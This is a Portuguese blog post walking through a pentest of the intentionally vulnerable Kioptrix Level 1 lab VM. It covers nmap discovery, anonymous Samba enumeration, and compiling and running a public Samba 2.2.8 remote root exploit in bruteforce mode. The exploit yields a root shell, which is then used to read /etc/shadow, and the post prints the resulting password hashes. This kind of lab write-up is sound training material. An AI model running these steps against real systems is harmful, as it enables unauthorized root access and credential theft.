sábado, 23 de junho de 2012

KIOPTRIX SAMBA EXPLOITATION

Neste artigo, estaremos fazendo um laboratório de Pentest, com uma distro própria para isso, chamada KIOPTRIX.

Maiores informações e Download você pode estar acessando diretamente o site.

http://www.kioptrix.com/blog/

Neste artigo vamos estar utilizando o Kioptrix Level 1, onde o principal objetivo é ganhar o acesso root.

Os testes vou utilizar uma máquina Virtual com Backtrack 5 R2.

Quando subimos a ISO do Kioptrix, ela já está configurada para buscar diretamente o ip por dhcp.

Precisamos identificar qual o ip que a mesma está utilizando.

Para isso vamos efetuar os seguintes testes:

1-) Discovery
root@bt:~# nmap -f -n -P0 -v -p- -T4 192.168.0.0/24
Nmap scan report for 192.168.0.104
Host is up (0.00084s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
1024/tcp  open  kdm
45295/tcp open  unknown
MAC Address: 30:14:4A:12:1D:E2 (Wistron Neweb)

root@bt:~# nmap -n -sTUV -pT:22,80,11,139,443,32768,U:111,137,32768 192.168.0.104

Starting Nmap 6.00 ( http://nmap.org ) at 2012-06-23 23:51 BRT
Nmap scan report for 192.168.0.104
Host is up (0.0038s latency).
PORT      STATE  SERVICE              VERSION
11/tcp    closed systat
22/tcp    open   ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open   http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
139/tcp   open   netbios-ssn          Samba smbd (workgroup: MYGROUP)
443/tcp   open   ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp closed filenet-tms
111/udp   open   rpcbind (rpcbind V2) 2 (rpc #100000)
137/udp   open   netbios-ns           Microsoft Windows XP netbios-ssn
32768/udp closed omad
MAC Address: 30:14:4A:12:1D:E2 (Wistron Neweb)
Service Info: Host: KIOPTRIX; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds

2-) Banner com SMBCLIENT como anonymous.

root@bt:~# smbclient -L 192.168.0.104 -N
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

    Sharename       Type      Comment
    ---------                 ----         -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport

    IPC$           IPC       IPC Service (Samba Server)
    ADMIN$     Disk      IPC Service (Samba Server)

Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

    Server               Comment
    ---------                     -------
    KIOPTRIX             Samba Server

    Workgroup           Master
    ---------                     -------
    MYGROUP              KIOPTRIX
    WORKGROUP         THIAGO-PC

Note que a versão utilizada pelo SAMBA é a versão 2.2.1a.

Vamos procurar um exploit para esta versão, utilizando o recurso de exploit-db no próprio backtrack.

root@bt:/pentest/exploits/exploitdb# ./searchsploit samba
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Samba 2.2.x Remote Root Buffer Overflow Exploit                             /linux/remote/7.pl
Samba 2.2.8 Remote Root Exploit - sambal.c                                  /linux/remote/10.c
Samba 2.2.8 (Bruteforce Method) Remote Root Exploit                         /linux/remote/55.c
MS Windows XP/2003 Samba Share Resource Exhaustion Exploit                  /windows/dos/148.sh
Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit                   /linux/remote/364.pl
Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit               /windows/dos/2934.php
GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities                   /php/webapps/4575.txt
Samba 3.0.27a send_mailslot() Remote Buffer Overflow PoC                    /linux/dos/4732.c
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC          /multiple/dos/5712.pl
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC          /multiple/dos/5712.pl
Samba < 3.0.20 Remote Heap Overflow Exploit (oldie but goodie)              /linux/remote/7701.txt
Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)                              /osX/remote/9924.rb

Para este vamos estar utilizando o exploit 10.c, onde vamos compilar e alterar as saídas de rro que retornar.

Obs* Os erros na compilação são propositais, paradificultar os scripts kidies, onde se faz necessário aprender com os erros retornados e entender a funcionalidade do código.

Copiaremos este exploit para um diretório e vamos executar o mesmo:

root@bt:~# cp /pentest/exploits/exploitdb/platforms/linux/remote/10.c /root/10.c

Vamos compilar:

root@bt:~# gcc 10.c -o sambavul10

Dica: Para a correção dos erros retornados com o comando gcc, é necessário a identação correta do código.

Vamos executar o exploit:

root@bt:~# ./sambavul10 -v -d -0 -S 192.168.0.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ Verbose mode.
+ [192.168.0.104] Samba

Faça um ctrl + c para parar o Scan.

Agora vamos executar com o parametro -b para efetuar um bruteforce e ganhar o acesso atravé do serviço do SAMBA:

root@bt:~# ./sambavul10 -b 0 -v 192.168.0.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

Veja a saída comando já identificando o hostna e o parametro id onde já informa as credenciais de root.

Agora vamos verificar o arquivo shadow:

root@bt:~# ./sambavul10 -b 0 -v 192.168.0.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
cd /etc ; cat shadow
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::
sync:*:14513:0:99999:7:::
shutdown:*:14513:0:99999:7:::
halt:*:14513:0:99999:7:::
mail:*:14513:0:99999:7:::
news:*:14513:0:99999:7:::
uucp:*:14513:0:99999:7:::
operator:*:14513:0:99999:7:::
games:*:14513:0:99999:7:::
gopher:*:14513:0:99999:7:::
ftp:*:14513:0:99999:7:::
nobody:*:14513:0:99999:7:::
mailnull:!!:14513:0:99999:7:::
rpm:!!:14513:0:99999:7:::
xfs:!!:14513:0:99999:7:::
rpc:!!:14513:0:99999:7:::
rpcuser:!!:14513:0:99999:7:::
nfsnobody:!!:14513:0:99999:7:::
nscd:!!:14513:0:99999:7:::
ident:!!:14513:0:99999:7:::
radvd:!!:14513:0:99999:7:::
postgres:!!:14513:0:99999:7:::
apache:!!:14513:0:99999:7:::
squid:!!:14513:0:99999:7:::
pcap:!!:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::

Neste artigo a idéia foi mostrar os passos para completar o desafio de Level 1, onde é necessário ganhar o shell como root : )





Nenhum comentário:

Postar um comentário